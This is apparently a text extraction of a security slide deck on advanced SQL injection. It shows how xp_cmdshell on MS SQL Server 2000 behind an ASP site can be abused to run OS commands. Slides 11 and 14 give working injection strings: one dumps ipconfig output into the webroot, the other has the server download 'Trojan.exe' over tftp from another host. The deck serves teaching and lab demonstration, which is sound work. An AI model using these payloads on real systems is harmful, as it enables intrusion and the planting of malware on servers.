This document discusses advanced SQL injection techniques. It begins by defining SQL injection as injecting SQL commands into a database through an application. Many applications and programming languages are vulnerable if they use user input in SQL statements. Stored procedures like xp_cmdshell in Microsoft SQL Server allow executing operating system commands, which can be exploited. The document demonstrates SQL injection on a vulnerable ASP site connected to SQL Server 2000 to execute commands like ipconfig and upload a file via tftp.

1.  Advanced Exploitation
using SQL Injection
 By Varun Duggal
 Work in Application Security Domain

2. SQL Injection
 The ability to inject SQL commands into the database engine through an
existing application
 SQL Injection occurs when user-supplied data is sent to an interpreter as
part of a command or query
 Attackers trick the interpreter into executing unintended commands via
supplying specially crafted data
 Injection flaws allow attackers to create, read, update, or delete any
arbitrary data available to the application

3. Vulnerable Applications
 Almost all SQL databases and programming languages are potentially
vulnerable
 MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access,
Sybase, Informix, etc
 Accessed through applications developed using:
 Perl and CGI scripts that access databases
 ASP, JSP, PHP
 XML, XSL and XSQL
 Javascript
 VB, MFC, and other ODBC-based tools and APIs
 DB specific Web-based applications and API‟s
 Reports and DB Applications
 3 and 4GL-based languages (C, OCI, Pro*C, and COBOL)
 many more

4. Stored procedure
 A stored procedure is a subroutine available to applications accessing a
relational database system
 Stored procedures (sometimes called a sproc or SP) are actually stored in
the database data dictionary

5. Exploiting the Vulnerability
 xp_cmdshell stored procedure, which is built into MS-SQL by Default
 Allows users to execute operating system commands

6. Tasks
 Executing any type OS commands
 Ping Server
 Directory Listing
 Create File
 Defacing Website
 Execute Applications
 Upload and Download files

7. More Stored Procedures
 (xp_cmdshell)
 (xp_regread)
 (xp_servicecontrol)
 (xp_availablemedia)
 (xp_enumdsn)
 (xp_loginconfig)
 (xp_makecab)
 (xp_ntsec_enumdomains)
 (xp_terminate_process)

8. Demo
 Test Bench
 O. S : Windows XP Professional
 Frontend: ASP
 Backend: MSSQL 2000
 Web Server: IIS 5.0

9.  Open the URL in the http://localhost/sql.asp?id=1

10. Checking Vulnerable or Not
 Enter a single quote in the id parameter the error message indicates
it‟s vulnerable to SQL Injection.

11.  Now open the URL and run the command
„;exec master..xp_cmdshell “ ipconfig > c:inetpubwwwroottest.txt”--

12.  Now finally file created on the web server access that file as shown in
the below snapshot:

13. Upload a file on the server
 Open tftp server containing malicious code to be uploaded

14.  Now open the URL and run the command
 „;exec master..xp_cmdshell “tftp –i 192.168.1.5 GET Trojan.exe
C:Trojan.exe”--

15.  Logs of Tftp shows file gets uploaded on the server